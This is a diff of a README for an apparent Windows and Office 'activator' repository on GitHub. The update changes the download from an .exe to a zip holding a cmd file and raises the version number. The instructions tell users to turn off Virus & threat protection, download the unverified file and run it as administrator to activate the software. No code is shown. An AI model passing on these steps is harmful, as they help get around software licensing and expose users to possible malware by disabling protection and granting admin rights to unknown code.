BINOD-XD/Windows-Office-Activator/README.md

 ## How To Use :
 -   Turn Off Virus & threat protection
--   Download the file from here <a href="https://github.com/BINOD-XD/Windows-Office-Activator-By-RXS/blob/main/Windows%2BOffice%20Activator%20By%20RXS.exe?raw=true">DOWNLOAD</a>
+-   Download the zip file from here <a href="https://github.com/BINOD-XD/Windows-Office-Activator/blob/main/Windows_activator_by_rxs.zip?raw=true">DOWNLOAD</a>
+-   Extract the downloaded zip file
--   Right-click on the downloaded exe file
+-   Right-click on the cmd file
 -   Click Run as administrator
 -   You will see the activation options, and follow onscreen instructions.
 -   That's all.

 ```
-Latest Version: 2.0
+Latest Version: 9.0
-Release date: 31-Aug-2023
+Release date: 15-Oct-2023
 ```

 ## WARNING :